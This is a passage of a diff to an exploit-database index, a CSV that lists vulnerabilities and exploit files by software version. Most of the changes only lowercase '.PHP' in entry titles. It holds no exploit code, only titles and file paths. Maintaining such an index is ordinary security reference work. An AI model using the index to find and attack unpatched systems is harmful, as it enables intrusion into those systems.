- 'article.php' SQL Injection Vulnerability",2005-12-01,r0t,php,webapps,0 -26689,platforms/php/webapps/26689.txt,"DotClear 1.2.1/1.2.2 Session.PHP SQL Injection Vulnerability",2005-12-01,Siegfried,php,webapps,0 +26689,platforms/php/webapps/26689.txt,"DotClear 1.2.1/1.2.2 Session.php SQL Injection Vulnerability",2005-12-01,Siegfried,php,webapps,0 26690,platforms/windows/dos/26690.c,"Microsoft Windows 2000/2003/XP - CreateRemoteThread Local Denial of Service Vulnerability",2005-12-01,"Nima Salehi",windows,dos,0 -26691,platforms/php/webapps/26691.txt,"WebCalendar 1.0.1 Layers_Toggle.PHP HTTP Response Splitting Vulnerability",2005-12-01,lwang,php,webapps,0 -26692,platforms/php/webapps/26692.txt,"Extreme Corporate 6.0 Extremesearch.PHP Cross-Site Scripting Vulnerability",2005-12-01,r0t,php,webapps,0 +26691,platforms/php/webapps/26691.txt,"WebCalendar 1.0.1 Layers_Toggle.php HTTP Response Splitting Vulnerability",2005-12-01,lwang,php,webapps,0 +26692,platforms/php/webapps/26692.txt,"Extreme Corporate 6.0 Extremesearch.php Cross-Site Scripting Vulnerability",2005-12-01,r0t,php,webapps,0 26693,platforms/php/webapps/26693.txt,"Edgewall Software Trac 0.9 Ticket Query Module SQL Injection Vulnerability",2005-12-01,"David Maciejak",php,webapps,0 26694,platforms/php/webapps/26694.txt,"phpMyChat 0.14.6 start_page.css.php medium Parameter XSS",2005-12-01,"Louis Wang",php,webapps,0 26695,platforms/php/webapps/26695.txt,"phpMyChat 0.14.6 style.css.php medium Parameter XSS",2005-12-01,"Louis Wang",php,webapps,0 26696,platforms/php/webapps/26696.txt,"phpMyChat 0.14.6 users_popupL.php From Parameter XSS",2005-12-01,"Louis Wang",php,webapps,0 -26697,platforms/php/webapps/26697.php,"PHPX 3.5.x Admin Login.PHP SQL Injection Vulnerability",2005-11-30,rgod,php,webapps,0 +26697,platforms/php/webapps/26697.php,"PHPX 3.5.x Admin Login.php SQL Injection Vulnerability",2005-11-30,rgod,php,webapps,0 26698,platforms/php/webapps/26698.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 gallery.php CatID Parameter SQL Injection",2005-12-02,r0t,php,webapps,0 26699,platforms/php/webapps/26699.txt,"NetClassifieds Standard 1.9/Professional 1.5/Premium 1.0 ViewItem.php ItemNum Parameter SQL Injection",2005-12-02,r0t,php,webapps,0 26700,platforms/jsp/webapps/26700.txt,"Java Search Engine 0.9.34 - Search.JSP Cross-Site Scripting Vulnerability",2005-12-02,r0t,jsp,webapps,0 @@ -23826,14 +23826,14 @@ id,file,description,date,author,platform,type,port 26703,platforms/windows/local/26703.py,"Adobe Reader X 10.1.4.38 - BMP/RLE Heap Corruption",2013-07-08,feliam,windows,local,0 26704,platforms/asp/webapps/26704.txt,"Solupress News 1.0 - Search.ASP Cross-Site Scripting Vulnerability",2005-12-03,r0t3d3Vil,asp,webapps,0 26705,platforms/asp/webapps/26705.txt,"SiteBeater News 4.0 Archive.ASP Cross-Site Scripting Vulnerability",2005-12-03,r0t3d3Vil,asp,webapps,0 -26706,platforms/php/webapps/26706.txt,"PHP-Fusion 6.0.109 Messages.PHP SQL Injection Vulnerability",2005-12-03,"Nolan West",php,webapps,0 +26706,platforms/php/webapps/26706.txt,"PHP-Fusion 6.0.109 Messages.php SQL Injection Vulnerability",2005-12-03,"Nolan West",php,webapps,0 26707,platforms/php/webapps/26707.txt,"Alisveristr E-commerce Login Multiple SQL Injection Vulnerabilities",2005-12-03,B3g0k,php,webapps,0 26708,platforms/windows/local/26708.rb,"ERS Viewer 2013 ERS File Handling Buffer Overflow",2013-07-09,metasploit,windows,local,0 26709,platforms/lin_x86/local/26709.txt,"Solaris Recommended Patch Cluster 6/19 - Local Root on x86",2013-07-09,"Larry W. Cashdollar",lin_x86,local,0 26710,platforms/multiple/dos/26710.txt,"Apache CXF < 2.5.10 / 2.6.7 / 2.7.4 - Denial of Service",2013-07-09,"SEC Consult",multiple,dos,0 26713,platforms/php/webapps/26713.txt,"phpYellowTM 5.33 - search_result.php haystack Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 26714,platforms/php/webapps/26714.txt,"phpYellowTM 5.33 print_me.php ckey Parameter SQL Injection",2005-12-03,r0t3d3Vil,php,webapps,0 -26715,platforms/php/webapps/26715.txt,"Widget Property 1.1.19 Property.PHP SQL Injection Vulnerability",2005-11-05,r0t3d3Vil,php,webapps,0 +26715,platforms/php/webapps/26715.txt,"Widget Property 1.1.19 Property.php SQL Injection Vulnerability",2005-11-05,r0t3d3Vil,php,webapps,0 26716,platforms/cgi/webapps/26716.txt,"Easy Search System 1.1 - Search.cgi Cross-Site Scripting Vulnerability",2005-12-05,r0t,cgi,webapps,0 26717,platforms/php/webapps/26717.txt,"Web4Future eCommerce Enterprise Edition 2.1 view.php Multiple Parameter SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 26718,platforms/php/webapps/26718.txt,"Web4Future eCommerce Enterprise Edition 2.1 index.php Multiple Parameter SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 @@ -23846,9 +23846,9 @@ id,file,description,date,author,platform,type,port 26725,platforms/php/webapps/26725.txt,"Web4Future eDating Professional 5.0 gift.php cid Parameter SQL Injection",2005-12-05,r0t,php,webapps,0 26726,platforms/php/webapps/26726.txt,"Web4Future eDating Professional 5.0 articles.php cat Parameter SQL Injection",2005-12-05,r0t,php,webapps,0 26727,platforms/php/webapps/26727.txt,"Web4Future eDating Professional 5.0 fq.php cid Parameter SQL Injection",2005-12-05,r0t,php,webapps,0 -26728,platforms/php/webapps/26728.txt,"Web4Future Portal Solutions Comentarii.PHP SQL Injection Vulnerability",2005-12-05,r0t,php,webapps,0 -26729,platforms/php/webapps/26729.txt,"Web4Future Affiliate Manager PRO 4.1 Functions.PHP SQL Injection Vulnerability",2005-12-05,r0t,php,webapps,0 -26730,platforms/php/webapps/26730.txt,"Web4Future Portal Solutions Arhiva.PHP Directory Traversal Vulnerability",2005-12-05,r0t,php,webapps,0 +26728,platforms/php/webapps/26728.txt,"Web4Future Portal Solutions Comentarii.php SQL Injection Vulnerability",2005-12-05,r0t,php,webapps,0 +26729,platforms/php/webapps/26729.txt,"Web4Future Affiliate Manager PRO 4.1 Functions.php SQL Injection Vulnerability",2005-12-05,r0t,php,webapps,0 +26730,platforms/php/webapps/26730.txt,"Web4Future Portal Solutions Arhiva.php Directory Traversal Vulnerability",2005-12-05,r0t,php,webapps,0 26731,platforms/php/webapps/26731.txt,"Blog System 1.2 index.php cat Parameter SQL Injection",2005-12-05,r0t3d3Vil,php,webapps,0 26732,platforms/php/webapps/26732.txt,"Edgewall Software Trac 0.7.1/0.8/0.9 - Search Module SQL Injection Vulnerability",2005-12-05,anonymous,php,webapps,0 26733,platforms/windows/dos/26733.py,"Jolix Media Player 1.1.0 - (.m3u) Denial of Service",2013-07-10,IndonesiaGokilTeam,windows,dos,0 @@ -23857,7 +23857,7 @@ id,file,description,date,author,platform,type,port 26736,platforms/hardware/webapps/26736.txt,"Zoom X4/X5 ADSL Modem - Multiple Vulnerabilities",2013-07-10,"Kyle Lovett",hardware,webapps,0 26737,platforms/linux/remote/26737.pl,"nginx 1.3.9/1.4.0 x86 - Brute Force Remote Exploit",2013-07-11,kingcope,linux,remote,0 26739,platforms/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80 -27634,platforms/php/webapps/27634.txt,"PatroNet CMS Index.PHP Cross-Site Scripting Vulnerability",2006-04-12,Soothackers,php,webapps,0 +27634,platforms/php/webapps/27634.txt,"PatroNet CMS Index.php Cross-Site Scripting Vulnerability",2006-04-12,Soothackers,php,webapps,0 26741,platforms/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x Email Attachments HTML Injection Vulnerability",2005-12-06,"SEC Consult",linux,remote,0 26742,platforms/asp/webapps/26742.txt,"DuWare DuPortalPro 3.4.3 Password.ASP Cross-Site Scripting Vulnerability",2005-12-06,Dj_Eyes,asp,webapps,0 26743,platforms/asp/webapps/26743.txt,"IISWorks ASPKnowledgeBase 2.0 KB.ASP Cross-Site Scripting Vulnerability",2005-12-06,r0t,asp,webapps,0 @@ -23865,17 +23865,17 @@ id,file,description,date,author,platform,type,port 26745,platforms/asp/webapps/26745.txt,"RWAuction Pro 4.0 - Search.ASP Cross-Site Scripting Vulnerability",2005-12-06,r0t,asp,webapps,0 26746,platforms/asp/webapps/26746.txt,"A-FAQ 1.0 faqDspItem.asp faqid Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 26747,platforms/asp/webapps/26747.txt,"A-FAQ 1.0 faqDsp.asp catcode Parameter SQL Injection",2005-12-06,r0t,asp,webapps,0 -26748,platforms/php/webapps/26748.txt,"DoceboLms 2.0.x Connector.PHP Directory Traversal Vulnerability",2005-12-06,rgod,php,webapps,0 +26748,platforms/php/webapps/26748.txt,"DoceboLms 2.0.x Connector.php Directory Traversal Vulnerability",2005-12-06,rgod,php,webapps,0 26749,platforms/linux/dos/26749.c,"Linux Kernel 2.6.x - File Lock Lease Local Denial of Service Vulnerability",2005-12-29,"J. Bruce Fields",linux,dos,0 -26750,platforms/php/webapps/26750.txt,"PluggedOut Blog 1.9.x Index.PHP Multiple SQL Injection Vulnerabilities",2005-12-06,r0t,php,webapps,0 -26751,platforms/php/webapps/26751.txt,"Cars Portal 1.1 Index.PHP Multiple SQL Injection Vulnerabilities",2005-12-06,r0t,php,webapps,0 +26750,platforms/php/webapps/26750.txt,"PluggedOut Blog 1.9.x Index.php Multiple SQL Injection Vulnerabilities",2005-12-06,r0t,php,webapps,0 +26751,platforms/php/webapps/26751.txt,"Cars Portal 1.1 Index.php Multiple SQL Injection Vulnerabilities",2005-12-06,r0t,php,webapps,0 26752,platforms/windows/local/26752.s,"Multiple Vendor BIOS Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,windows,local,0 26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0 26754,platforms/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0/4.1 Policy Bypass Vulnerability",2005-12-07,"Viktor Steinmann",hardware,dos,0 26755,platforms/php/webapps/26755.txt,"Thwboard Beta 2.8 calendar.php year Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 26756,platforms/php/webapps/26756.txt,"Thwboard Beta 2.8 v_profile.php user Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 26757,platforms/php/webapps/26757.txt,"Thwboard Beta 2.8 misc.php userid Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0 -26758,platforms/php/webapps/26758.txt,"DRZES Hms 3.2 Login.PHP Cross-Site Scripting Vulnerability",2005-12-07,Vipsta,php,webapps,0 +26758,platforms/php/webapps/26758.txt,"DRZES Hms 3.2 Login.php Cross-Site Scripting Vulnerability",2005-12-07,Vipsta,php,webapps,0 26759,platforms/asp/webapps/26759.txt,"ASPMForum forum.asp baslik Parameter SQL Injection",2005-12-07,dj_eyes2005,asp,webapps,0 26760,platforms/asp/webapps/26760.txt,"ASPMForum kullanicilistesi.asp harf Parameter SQL Injection",2005-12-07,dj_eyes2005,asp,webapps,0 26761,platforms/cgi/webapps/26761.txt,"Dell TrueMobile 2300 - Remote Credential Reset Vulnerability",2005-12-07,TNull,cgi,webapps,0 @@ -23887,7 +23887,7 @@ id,file,description,date,author,platform,type,port 26767,platforms/cfm/webapps/26767.txt,"CF_Nuke 4.6 Index.CFM Cross-Site Scripting Vulnerabilities",2005-12-08,r0t,cfm,webapps,0 26768,platforms/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 Cal_make.PL Cross-Site Scripting Vulnerability",2005-12-08,$um$id,cgi,remote,0 26769,platforms/windows/dos/26769.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 Malformed Range Memory Corruption Vulnerability",2005-12-08,fearwall,windows,dos,0 -26770,platforms/php/webapps/26770.txt,"MilliScripts 1.4 Register.PHP Cross-Site Scripting Vulnerability",2005-12-08,"Security Nation",php,webapps,0 +26770,platforms/php/webapps/26770.txt,"MilliScripts 1.4 Register.php Cross-Site Scripting Vulnerability",2005-12-08,"Security Nation",php,webapps,0 26771,platforms/cgi/webapps/26771.txt,"Nortel SSL VPN 4.2.1.6 - Web Interface Input Validation Vulnerability",2005-12-08,"Daniel Fabian",cgi,webapps,0 26772,platforms/cfm/webapps/26772.txt,"Magic Book Professional 2.0 Book.CFM Cross-Site Scripting Vulnerability",2005-12-12,r0t,cfm,webapps,0 26773,platforms/windows/remote/26773.txt,"LogiSphere 0.9.9 j viewsource.jsp source Parameter Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote,0 @@ -23902,11 +23902,11 @@ id,file,description,date,author,platform,type,port 26782,platforms/php/webapps/26782.txt,"Scout Portal Toolkit 1.3.1 - SPT-AdvancedSearch.php Multiple Parameter XSS",2005-12-12,Preddy,php,webapps,0 26783,platforms/php/webapps/26783.txt,"Scout Portal Toolkit 1.3.1 - SPT-UserLogin.php Multiple Parameter SQL Injection",2005-12-12,Preddy,php,webapps,0 26784,platforms/php/webapps/26784.txt,"BTGrup Admin WebController SQL Injection Vulnerability",2005-12-12,khc@bsdmail.org,php,webapps,0 -26785,platforms/php/webapps/26785.txt,"Arab Portal 2.0 Link.PHP SQL Injection Vulnerabilities",2005-12-12,stranger-killer,php,webapps,0 +26785,platforms/php/webapps/26785.txt,"Arab Portal 2.0 Link.php SQL Injection Vulnerabilities",2005-12-12,stranger-killer,php,webapps,0 26786,platforms/cgi/webapps/26786.txt,"EveryAuction 1.53 Auction.PL Cross-Site Scripting Vulnerability",2005-12-13,$um$id,cgi,webapps,0 26787,platforms/php/webapps/26787.txt,"phpCOIN 1.2.2 - CCFG[_PKG_PATH_DBSE] Remote File Inclusion",2005-12-13,retrogod@aliceposta.it,php,webapps,0 26788,platforms/php/webapps/26788.txt,"phpCOIN 1.2.2 - includes/db.php $_CCFG[_PKG_PATH_DBSE] Parameter Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps,0 -26789,platforms/php/webapps/26789.txt,"EncapsGallery 1.0 Gallery.PHP SQL Injection Vulnerability",2005-12-13,r0t3d3Vil,php,webapps,0 +26789,platforms/php/webapps/26789.txt,"EncapsGallery 1.0 Gallery.php SQL Injection Vulnerability",2005-12-13,r0t3d3Vil,php,webapps,0 26790,platforms/php/webapps/26790.txt,"PhpWebGallery 1.3.4/1.5.1 comments.php Multiple Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26791,platforms/php/webapps/26791.txt,"PhpWebGallery 1.3.4/1.5.1 category.php search Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26792,platforms/php/webapps/26792.txt,"PhpWebGallery 1.3.4/1.5.1 picture.php image_id Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 @@ -23915,7 +23915,7 @@ id,file,description,date,author,platform,type,port 26795,platforms/php/webapps/26795.txt,"VCD-db 0.9x search.php by Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26796,platforms/php/webapps/26796.txt,"VCD-db 0.9x Search Module batch Parameter XSS",2005-12-13,r0t3d3Vil,php,webapps,0 26797,platforms/php/webapps/26797.txt,"PHP JackKnife 2.21 - Cross-Site Scripting Vulnerability",2005-12-13,r0t3d3Vil,php,webapps,0 -26798,platforms/php/webapps/26798.txt,"Mantis 0.x/1.0 View_filters_page.PHP Cross-Site Scripting Vulnerability",2005-12-13,r0t,php,webapps,0 +26798,platforms/php/webapps/26798.txt,"Mantis 0.x/1.0 View_filters_page.php Cross-Site Scripting Vulnerability",2005-12-13,r0t,php,webapps,0 26799,platforms/php/webapps/26799.txt,"Snipe Gallery 3.1.4 view.php gallery_id Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 26800,platforms/php/webapps/26800.txt,"Snipe Gallery 3.1.4 image.php image_id Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 26801,platforms/php/webapps/26801.txt,"Snipe Gallery 3.1.4 - search.php keyword Parameter XSS",2005-12-13,r0t,php,webapps,0 @@ -23929,9 +23929,9 @@ id,file,description,date,author,platform,type,port 26809,platforms/php/webapps/26809.txt,"McGallery 1.0/1.1/2.2 show.php Multiple Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 26810,platforms/php/webapps/26810.txt,"McGallery 1.0/1.1/2.2 index.php album Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 26811,platforms/linux/dos/26811.c,"Linux Kernel 2.6.x - INVALIDATE_INODE_PAGES2 - Local Integer Overflow Vulnerability",2005-12-13,"Oleg Drokin",linux,dos,0 -26812,platforms/php/webapps/26812.txt,"PHP Web Scripts Ad Manager Pro 2.0 Advertiser_statistic.PHP SQL Injection Vulnerability",2005-12-14,r0t3d3Vil,php,webapps,0 -26813,platforms/php/webapps/26813.txt,"Jamit Job Board 2.4.1 Index.PHP SQL Injection Vulnerability",2005-12-14,r0t3d3Vil,php,webapps,0 -26814,platforms/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 View_Results.PHP SQL Injection Vulnerability",2005-12-14,r0t3d3Vil,php,webapps,0 +26812,platforms/php/webapps/26812.txt,"PHP Web Scripts Ad Manager Pro 2.0 Advertiser_statistic.php SQL Injection Vulnerability",2005-12-14,r0t3d3Vil,php,webapps,0 +26813,platforms/php/webapps/26813.txt,"Jamit Job Board 2.4.1 Index.php SQL Injection Vulnerability",2005-12-14,r0t3d3Vil,php,webapps,0 +26814,platforms/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 View_Results.php SQL Injection Vulnerability",2005-12-14,r0t3d3Vil,php,webapps,0 26815,platforms/php/webapps/26815.txt,"CourseForum Technologies ProjectForum 4.7 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,r0t3d3Vil,php,webapps,0 26816,platforms/windows/dos/26816.pl,"AppServ Open Project 2.5.3 - Remote Denial of Service Vulnerability",2005-12-14,Rozor,windows,dos,0 26817,platforms/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Byapss Vulnerability",2005-12-14,"Maksymilian Arciemowicz",php,webapps,0 @@ -23941,9 +23941,9 @@ id,file,description,date,author,platform,type,port 26821,platforms/asp/webapps/26821.txt,"ASPBB 0.4 topic.asp TID Parameter SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 26822,platforms/asp/webapps/26822.txt,"ASPBB 0.4 forum.asp FORUM_ID Parameter SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 26823,platforms/asp/webapps/26823.txt,"ASPBB 0.4 profile.asp PROFILE_ID Parameter SQL Injection",2005-12-14,Dj_Eyes,asp,webapps,0 -26824,platforms/php/webapps/26824.txt,"WikkaWiki 1.1.6 TextSearch.PHP Cross-Site Scripting Vulnerability",2005-12-14,r0t,php,webapps,0 +26824,platforms/php/webapps/26824.txt,"WikkaWiki 1.1.6 TextSearch.php Cross-Site Scripting Vulnerability",2005-12-14,r0t,php,webapps,0 26825,platforms/hardware/dos/26825.txt,"Multiple Linksys Routers LanD Packet Denial of Service Vulnerability",2005-12-14,"Justin M. Wray",hardware,dos,0 -26826,platforms/php/webapps/26826.txt,"Netref 3.0 Index.PHP SQL Injection Vulnerability",2005-12-14,syst3m_f4ult,php,webapps,0 +26826,platforms/php/webapps/26826.txt,"Netref 3.0 Index.php SQL Injection Vulnerability",2005-12-14,syst3m_f4ult,php,webapps,0 26831,platforms/php/webapps/26831.txt,"QuickPayPro 3.1 - tracking.details.php trackingid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26832,platforms/php/webapps/26832.txt,"QuickPayPro 3.1 sales.view.php customerid Parameter SQL Injection",2005-12-14,r0t,php,webapps,0 26833,platforms/hardware/dos/26833.txt,"Multiple Unspecified Cisco Catalyst Switches LanD Packet Denial of Service Vulnerability",2005-12-14,"Justin M. Wray",hardware,dos,0 @@ -23980,12 +23980,12 @@ id,file,description,date,author,platform,type,port 26864,platforms/cgi/webapps/26864.txt,"WebGlimpse 2.x - Cross-Site Scripting Vulnerability",2005-12-16,r0t3d3Vil,cgi,webapps,0 26865,platforms/cgi/webapps/26865.txt,"WebCal 3.0 4 webcal.cgi Multiple Parameter XSS",2005-12-16,"Stan Bubrouski",cgi,webapps,0 26866,platforms/php/webapps/26866.txt,"Round Cube Webmail 0.1 -20051021 - Path Disclosure Weakness",2005-12-17,king_purba,php,webapps,0 -26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 Index.PHP Cross-Site Scripting Vulnerability",2005-12-19,"bogel and lukman",php,webapps,0 -26868,platforms/php/webapps/26868.txt,"JPortal 2.2.1/2.3 Forum Forum.PHP SQL Injection Vulnerability",2005-12-19,Zbigniew,php,webapps,0 +26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 Index.php Cross-Site Scripting Vulnerability",2005-12-19,"bogel and lukman",php,webapps,0 +26868,platforms/php/webapps/26868.txt,"JPortal 2.2.1/2.3 Forum Forum.php SQL Injection Vulnerability",2005-12-19,Zbigniew,php,webapps,0 26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 Unspecified Memory Corruption Vulnerabilities",2005-12-19,ad@heapoverflow.com,windows,dos,0 26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0 -26871,platforms/php/webapps/26871.txt,"PlaySms Index.PHP Cross-Site Scripting Vulnerability",2005-12-19,mohajali2k4,php,webapps,0 -26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 Members.PHP Cross-Site Scripting Vulnerability",2005-12-19,krasza,php,webapps,0 +26871,platforms/php/webapps/26871.txt,"PlaySms Index.php Cross-Site Scripting Vulnerability",2005-12-19,mohajali2k4,php,webapps,0 +26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 Members.php Cross-Site Scripting Vulnerability",2005-12-19,krasza,php,webapps,0 26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 default.asp ID Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0 26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 acidcat.mdb Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0 26875,platforms/asp/webapps/26875.txt,"allinta CMS 2.3.2 faq.asp s Parameter XSS",2005-12-19,r0t3d3Vil,asp,webapps,0 @@ -23996,7 +23996,7 @@ id,file,description,date,author,platform,type,port 26880,platforms/php/webapps/26880.txt,"FLIP 0.9.0.1029 - text.php name Parameter XSS",2005-12-19,r0t3d3Vil,php,webapps,0 26881,platforms/php/webapps/26881.txt,"FLIP 0.9.0.1029 - forum.php frame Parameter XSS",2005-12-19,r0t3d3Vil,php,webapps,0 26882,platforms/cfm/webapps/26882.txt,"Hot Banana Web Content Management Suite 5.3 - Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,cfm,webapps,0 -26883,platforms/php/webapps/26883.txt,"Libertas Enterprise CMS 3.0 Index.PHP Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 +26883,platforms/php/webapps/26883.txt,"Libertas Enterprise CMS 3.0 Index.php Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 26884,platforms/php/webapps/26884.txt,"Liferay Portal Enterprise 3.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,r0t3d3Vil,php,webapps,0 26885,platforms/php/webapps/26885.txt,"Lighthouse CMS 1.1 - Search Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 26886,platforms/linux/dos/26886.pl,"Squid 3.3.5 - DoS PoC",2013-07-16,kingcope,linux,dos,0 @@ -24009,10 +24009,10 @@ id,file,description,date,author,platform,type,port 26893,platforms/php/webapps/26893.txt,"Dell Kace 1000 SMA 5.4.70402 - Persistent XSS Vulnerabilities",2013-07-16,Vulnerability-Lab,php,webapps,0 26894,platforms/php/webapps/26894.txt,"Saurus CMS 4.7.1 - Multiple Vulnerabilities",2013-07-16,waraxe,php,webapps,0 26895,platforms/php/webapps/26895.txt,"Magnolia Search Module 2.1 - Cross-Site Scripting Vulnerability",2005-12-19,r0t3d3Vil,php,webapps,0 -26896,platforms/php/webapps/26896.txt,"ContentServ 3.0/3.1/4.0 Index.PHP SQL Injection Vulnerability",2005-12-19,r0t,php,webapps,0 -26897,platforms/php/webapps/26897.txt,"Direct News 4.9 Index.PHP SQL Injection Vulnerability",2005-12-19,r0t,php,webapps,0 -26898,platforms/php/webapps/26898.txt,"ODFaq 2.1 FAQ.PHP SQL Injection Vulnerability",2005-12-19,r0t,php,webapps,0 -26899,platforms/php/webapps/26899.txt,"Marwel 2.7 Index.PHP SQL Injection Vulnerability",2005-12-19,r0t,php,webapps,0 +26896,platforms/php/webapps/26896.txt,"ContentServ 3.0/3.1/4.0 Index.php SQL Injection Vulnerability",2005-12-19,r0t,php,webapps,0 +26897,platforms/php/webapps/26897.txt,"Direct News 4.9 Index.php SQL Injection Vulnerability",2005-12-19,r0t,php,webapps,0 +26898,platforms/php/webapps/26898.txt,"ODFaq 2.1 FAQ.php SQL Injection Vulnerability",2005-12-19,r0t,php,webapps,0 +26899,platforms/php/webapps/26899.txt,"Marwel 2.7 Index.php SQL Injection Vulnerability",2005-12-19,r0t,php,webapps,0 26900,platforms/php/webapps/26900.txt,"Miraserver 1.0 RC4 index.php page Parameter SQL Injection",2005-12-19,r0t,php,webapps,0 26901,platforms/php/webapps/26901.txt,"Miraserver 1.0 RC4 newsitem.php id Parameter SQL Injection",2005-12-19,r0t,php,webapps,0 26902,platforms/php/webapps/26902.txt,"Miraserver 1.0 RC4 article.php cat Parameter SQL Injection",2005-12-19,r0t,php,webapps,0 @@ -24029,12 +24029,12 @@ id,file,description,date,author,platform,type,port 26913,platforms/linux/remote/26913.c,"Info-ZIP UnZip 5.x File Name Buffer Overflow Vulnerability",2005-12-19,DVDMAN,linux,remote,0 26914,platforms/cgi/webapps/26914.txt,"Extensis Portfolio Netpublish Server 7.0 - Server.NP Directory Traversal Vulnerability",2005-12-20,"Andy Davis",cgi,webapps,0 26915,platforms/linux/dos/26915.txt,"Blender BlenLoader 2.x File Processing Integer Overflow Vulnerability",2005-12-20,"Damian Put",linux,dos,0 -26916,platforms/php/webapps/26916.txt,"Enterprise Connector 1.0.2 Main.PHP SQL Injection Vulnerability",2005-12-20,"Attila Gerendi",php,webapps,0 +26916,platforms/php/webapps/26916.txt,"Enterprise Connector 1.0.2 Main.php SQL Injection Vulnerability",2005-12-20,"Attila Gerendi",php,webapps,0 26917,platforms/cgi/webapps/26917.txt,"LiveJournal Cleanhtml.PL HTML Injection Vulnerability",2005-12-20,"Andrew Farmer",cgi,webapps,0 26918,platforms/php/webapps/26918.txt,"Plogger Beta 2 - Remote File Include Vulnerabilities",2005-12-20,"Security .Net Information",php,webapps,0 26919,platforms/php/webapps/26919.txt,"AbleDesign D-Man 3.0 Title Parameter Cross-Site Scripting Vulnerability",2005-12-20,$um$id,php,webapps,0 26920,platforms/cfm/webapps/26920.txt,"Quick Square Development Honeycomb Archive 3.0 CategoryResults.cfm Multiple Parameter SQL Injection",2005-12-20,r0t3d3Vil,cfm,webapps,0 -26921,platforms/php/webapps/26921.txt,"Tolva 0.1 Usermods.PHP Remote File Include Vulnerability",2005-12-21,xbefordx,php,webapps,0 +26921,platforms/php/webapps/26921.txt,"Tolva 0.1 Usermods.php Remote File Include Vulnerability",2005-12-21,xbefordx,php,webapps,0 26922,platforms/multiple/dos/26922.pl,"Interaction SIP Proxy 3.0 - Remote Heap Corruption Denial of Service Vulnerability",2005-12-21,"Behrang Fouladi",multiple,dos,0 26923,platforms/php/webapps/26923.txt,"Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities",2005-12-21,"Alireza Hassani",php,webapps,0 26924,platforms/jsp/webapps/26924.txt,"OpenEdit 4.0 Results.HTML Cross-Site Scripting Vulnerability",2005-12-21,r0t3d3Vil,jsp,webapps,0 @@ -24068,14 +24068,14 @@ id,file,description,date,author,platform,type,port 26952,platforms/ios/webapps/26952.txt,"WiFly 1.0 Pro iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 26953,platforms/ios/webapps/26953.txt,"Flux Player 3.1.0 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 26954,platforms/ios/webapps/26954.txt,"ePhoto Transfer 1.2.1 iOS - Multiple Vulnerabilities",2013-07-18,Vulnerability-Lab,ios,webapps,0 -26955,platforms/php/webapps/26955.txt,"Xibo 1.2.2 and 1.4.1 (index.php p param) - Directory Traversal Vulnerability",2013-07-18,Mahendra,php,webapps,0 +26955,platforms/php/webapps/26955.txt,"Xibo 1.2.2 / 1.4.1 - index.php p param Directory Traversal Vulnerability",2013-07-18,Mahendra,php,webapps,0 26956,platforms/windows/webapps/26956.txt,"Dell PacketTrap MSP RMM 6.6.x - Multiple XSS Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0 26957,platforms/windows/webapps/26957.txt,"Dell PacketTrap PSA 7.1 - Multiple XSS Vulnerabilities",2013-07-18,Vulnerability-Lab,windows,webapps,0 26958,platforms/php/webapps/26958.txt,"Anchor CMS 0.9.1 - Stored XSS Vulnerability",2013-07-18,DURAKIBOX,php,webapps,0 26959,platforms/php/webapps/26959.txt,"Papoo 2.1.2 index.php menuid Parameter SQL Injection",2005-12-21,r0t3d3Vil,php,webapps,0 26960,platforms/php/webapps/26960.txt,"Papoo 2.1.2 guestbook.php menuid Parameter 